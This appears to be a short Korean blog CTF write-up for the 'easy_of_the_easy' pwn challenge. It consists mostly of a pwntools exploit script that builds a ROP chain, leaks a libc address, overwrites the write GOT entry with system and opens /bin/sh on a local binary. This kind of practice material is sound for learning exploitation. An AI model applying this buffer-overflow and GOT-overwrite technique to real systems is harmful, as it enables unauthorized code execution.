h3x0r easy_of_the_easy write-up
2018. 11. 7. 22:03ㆍCTF's Write-up
적당히 심심할때 풀어보면 좋을만한 문제였습니다.
easy_of_the_easy1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 | from pwn import * r = process("./easy_of_the_easy") e = ELF("./easy_of_the_easy") l = e.libc bss = e.bss()+0x16 write_got = e.got["write"] read_got = e.got["read"] read_plt = e.plt["read"] write_plt = e.plt["write"] shell = "/bin/sh\x00" pppr = 0x080489e9 context.log_level = "debug" def sendshell() : r.send(shell) log.info("send shell") sleep(0.1) def leak() : leakadd = u32(r.recv(4)) log.info (hex(leakadd)) baseadd = leakadd - l.sym['write'] log.info (hex(baseadd)) systemadd = baseadd + l.sym['system'] log.info (hex(systemadd)) sleep(0.1) r.send(p32(systemadd)) sleep(0.1) def hidden(): r.sendline("4 245687 1") r.sendline("0") r.sendline("4") r.sendline("1") r.sendline("1") print r.recv() sleep(0.1) def sendpayload() : payload = "" payload += "A"*22 payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bss) + p32(8) payload += p32(write_plt) + p32(pppr) + p32(1) + p32(write_got) + p32(8) payload += p32(read_plt) + p32(pppr) + p32(0) + p32(write_got) + p32(8) payload += p32(write_plt) + "AAAA" + p32(bss) r.send(payload) log.info("send payload") sleep(0.1) for i in range(0, 10) : r.sendline("1 1 0") r.sendline("2 2 1") r.sendline("3 1 1") r.sendline("4 1 1") r.recv() sleep() hidden() sendpayload() sendshell() leak() r.interactive() | cs |
'CTF's Write-up' 카테고리의 다른 글
| HACKCTF - Basic_BOF #2 (0) | 2020.07.07 |
|---|---|
| HACKCTF - Basic_BOF #1 (0) | 2020.07.06 |
| codegate2018 - BaskinRobins31 (0) | 2018.10.31 |
| codegate 2017 - babypwn (0) | 2018.09.20 |
| tamuCTF2018 - pwn3 (0) | 2018.09.14 |